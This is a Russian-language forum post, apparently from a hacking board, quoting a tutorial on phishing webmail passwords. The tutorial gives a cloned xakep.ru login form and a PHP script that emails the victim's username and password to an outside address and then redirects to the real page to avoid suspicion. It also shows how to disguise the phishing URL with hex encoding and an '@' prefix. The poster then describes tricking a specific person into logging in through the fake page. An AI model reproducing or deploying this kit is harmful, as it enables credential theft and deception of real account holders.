</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>
Цитата </td></tr><tr><td id="QUOTE">Теперь я раскажу вам о самом простом методе взлома, расчитанный на лоха. Ведь так просто заИметь шестизначку, но так-же легко её потерять. Для начала нам нужно сохранить на харде страницу
<span style='color:#00FF00'>ошибки</span>. Сами видете два поля ввода для <span style='color:#009900'>логин</span> и <span style='color:#009900'>пасс</span>. Нам нужно чтобы введя в эти поля данные пароль отсылался прямо к нам в руки. Теперь открываем её с помощью <span style='color:#009900'>html</span> редактора, лучше всего использовать
<span style='color:#00FF00'>DreamweaverMX</span>, хотя можете сделать это обычным Notepad, Вот фрагмент скрипта:
<span style='color:#0033FF'><table cellpadding=1 cellspacing=0 border=0>
<form method="post" name="logon" action="
http://mail.xakep.ru/cgi-bin/mail" onSubmit="Save();">
<tr>
<td class=small align=right><b>eiaei</b></td>
<td class=text><input type="text" name="username" size="8" style="width: 95px;"><input type="hidden" name="domain" value="xakep.ru"></td>
<td class=text> @xakep.ru</td>
<td>&nbsp;&nbsp;&nbsp;</td>
<td class=small align=right><b>ia?ieu</b></td>
<td class=text><input type="password" name="password" size="8" style="width: 95px;"></td>
</tr></span>
Нас интересуют только <span style='color:red'>action</span>, <span style='color:red'>username</span> и <span style='color:red'>password</span>. За что отвечают username и password на монятно. А в action нам следует указать путь к нашему <span style='color:#009900'>php скрипту</span>. Вот весь скрипт:
<span style='color:#0033FF'>
<?
mail("redx@narod.ru",
"Lost password",
"$username\n
$password
");
echo ("
<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://mail.xakep.ru/cgi-bin/mail?index=1\">
");
?></span>
<span style='color:#009900'>Редирект</span> тоже играет важную функцию, и он обязательно должен указывать на страницку ошибки, чтоб не возникало подозрений. Вроде у нас все настроено, осталось провести тест, посмотри на мой
<span style='color:#00FF00'>пример</span>.
Для танкистов: <span style='color:#CCFFFF'>нам нужен хост с поддержкой php</span>. Из бесплатных нам подойдет
<span style='color:#00FF00'>Holm</span>.
Кажись вы не довольны тем что <span style='color:#009900'>url</span> у вас получился типа <span style='color:#009900'>http://antilamer.h1.ru</span>. И возникает вопрос, как бы все это затарить. Я предлагаю вам хотя бы кодировать в
<span style='color:#00FF00'>hex</span>. И мы можем превратить наше
www.antilamer.h1.ru в <span style='color:#009900'>%61%6E%74%69%6C%61%6D%65%72% 2E%68%31%2E%72%75</span>. Можно перед hex кодом добавить еще
www.xakep.ru@. Выглядеть это будет так:
<span style='color:#009900'>http://xakep.ru@%61%6E%74%69%6C%61%6D%65%72%2E%68%31%2E%7 2%75</span>
Удачного хака.[/QUOTE]<span id='postcolor'>
Я написал такую статью, но на неё мало кто отреагировал, хотя..., самый действенный метод. В отличии от моей ловушки в которую мог попасть случайный прохожий, в этом методе можно направить свою атаку на определённого человека. Самое главное убедить его в необходимости залогиниться с нашей страницы. Методов моря, хоть мыльте от SUPPORT'а или как фантазия позволит. Я свою жертву в Инет-Клубе сам заставил залогиниться, набрал адрес своей страницы, и предложил ему проверить свою почту. Благо мест в зале небыло..., а я такой добрый.